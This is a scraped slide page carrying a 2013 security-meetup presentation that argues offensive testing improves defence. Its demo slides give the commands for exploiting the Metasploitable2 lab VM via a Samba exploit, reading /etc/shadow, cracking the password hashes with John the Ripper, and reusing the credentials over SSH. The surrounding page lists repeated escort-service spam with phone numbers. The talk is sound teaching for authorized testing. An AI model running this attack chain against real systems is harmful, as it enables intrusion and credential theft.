A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Recently uploaded (20)

Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 âś“Call Girls In Kalyan ( Mumbai ) secure service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

  • 1. “Improving your defensive security posture with offensive security strategies” Andrew Kozma HTCIA, Atlantic Chapter Meeting April 18th, 2013
  • 2. A bit about me… ď‚ž Infosec professional working in healthcare ď‚ž Co-founder of AtlSecCon ď‚ž Midnight ethical hacker ď‚ž A perpetual student ď‚ž Security researcher/philosopher ď‚ž Fan of the blues (Secretly want to learn how to play the harmonica)
  • 3. Offensive Security ď‚ž “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club ď‚ž Hacking our own infrastructure to improve defensive security measures and processes ď‚ž Tools – Kali Linux, a security distro maintained by Offensive- Security with all the tools required to test security, it’s free and always will be ď‚ž Tactics – The application of tools ď‚ž Strategy – The big picture, all the pieces working together to achieve an ultimate goal
  • 4. Creating a practice environment ď‚ž “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club ď‚ž The goal - a controlled environment where it is safe to practice offensive security techniques ď‚ž There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com) ď‚ž With proper planning and authorization along with an understanding of the risks you can test production infrastructure ď‚ž Virtualization is a beautiful thing!
  • 5.
  • 6. Demo (metasploitable2) ď‚ž NMAP Scan ď‚— Identify OS, Services and open ports ď‚ž Nessus Vuln Scan ď‚— Run a scan to find vulnerabilities that can potentially be exploited ď‚ž Metasploit console ď‚— Import the info ď‚— Exploit the target ď‚ž Post exploitation ď‚— Crack passwords with john ď‚— PWN the box
  • 7. Demo (nmap) • Scanning with nmap -O OS Detection -sV Service Version -sC NSE Scripts -oX Output in xml format --stylesheet nmap.xsl --open --reason • Copying the stylesheet to our working directory • Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
  • 9. Demo (Nessus) • Nessus Vulnerability Scanner • Not native to Kali-Linux • Download and install • dpkg –i “filename” • Register for Home feed (free) • Connect to Local host port 8834 • Login and select new scan
  • 10. Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
  • 11. Demo (Nessus) • Export and save the report
  • 13. Demo (metasploit) • Opening the Metasploit Framework Console • Enter the command “msfconsole” • Importing our nmap scan results into the metasploit database • Enter the command “db_import /path to the nmap scan”
  • 14. Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
  • 15. Demo (metasploit) • Import the nessus scan into metasploit with command “db_import /path to the file” • Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
  • 16. Demo (metasploit) • For this demo we are going to exploit samba • Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about its functions via the command “info”
  • 17. Demo (metasploit) • The command: “show options” indicates any variables that require a value to be set • For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address” • A payload that will be delivered to the target is required we issue the command “set PAYLOAD cmd/unix/bind/netcat”
  • 18. Demo (metasploit) • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
  • 19. Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root level access to the target and interact via this shell • Let’s display the target systems user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
  • 20. Demo (metasploit) • Now we need to grab the hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” • Once again we will be selecting the information displayed and will be copying it to a .txt file
  • 22. Demo (John The Ripper) • We are going to use John The Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hash into a format that John can understand • We combine both files to a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
  • 23. Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to directory the file resides in “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  • 24. Demo (John The Ripper) • To start cracking the password with John we issue the command: “john /path to the filename.txt” • John has loaded the hashes and has successfully cracked some of the passwords • Previously cracked passwords can be viewed with the command: “john –show /Path to the file.txt”
  • 25. Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command: “ssh –l msfadmin Target.IP.Address” • Now we have a terminal session vs a shell • In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
  • 26. Demo (Post Exploitation) • Lets review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm NFS services are running on the target…
  • 27. Demo (Post Exploitation) • Lets take a quick look at the NFS share available on the target • Uh oh… everything is shared • We are going to create a temp directory and then mount the share in it • Lets display the filesystem to see the NFS share mounted in temp
  • 28. Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again
  • 29. Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
  • 30. Breaking things to make them better ď‚ž “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club ď‚ž When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy in from management ď‚ž Document your findings indicating the threat, the likelihood of occurrence and the impact to the business ď‚ž Use this information to build business cases for investment in security solutions ď‚ž When you start looking at the production environment… there will be blood….
  • 31.
  • 32. Advanced Persistent Response ď‚ž “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club ď‚ž Understanding trends and current threats ď‚ž Filling in the gaps with security (Technology and process) ď‚ž Creating and implementing a security model that meets organizational needs
  • 33. Incident Response ď‚ž "With a gun barrel between your teeth, you speak only in vowels.“ ~Chuck Palahniuk, Fight Club ď‚ž Preparation ď‚— Have a plan, know who to call and when ď‚ž Identification ď‚— Determination of whether or not there was an incident ď‚ž Containment ď‚— Protecting other critical systems “stop the bleeding” ď‚ž Eradication ď‚— Addressing the vulnerabilities that were exploited ď‚ž Recovery ď‚— Returning to operational status ď‚ž Follow up ď‚— Lessons learned, prevent future incidents of the same nature
  • 34. Parting thoughts ď‚ž Do you still think the best defense is a good offense? ď‚ž IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
  • 35. References ď‚ž Jeremy Druin @webpwnized has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw ď‚ž @netbiosx has a tutorial available online regarding NFS and metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/ ď‚ž Nessus software and home feed licensing can be found on their site: http://www.tenable.com/ ď‚ž Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security ď‚ž Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875 ď‚ž Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at http://vulnhub.com/
  • 36. Thank you ď‚ž Twitter handle - @k0z1can ď‚ž ca.linkedin.com/in/andrewkozma/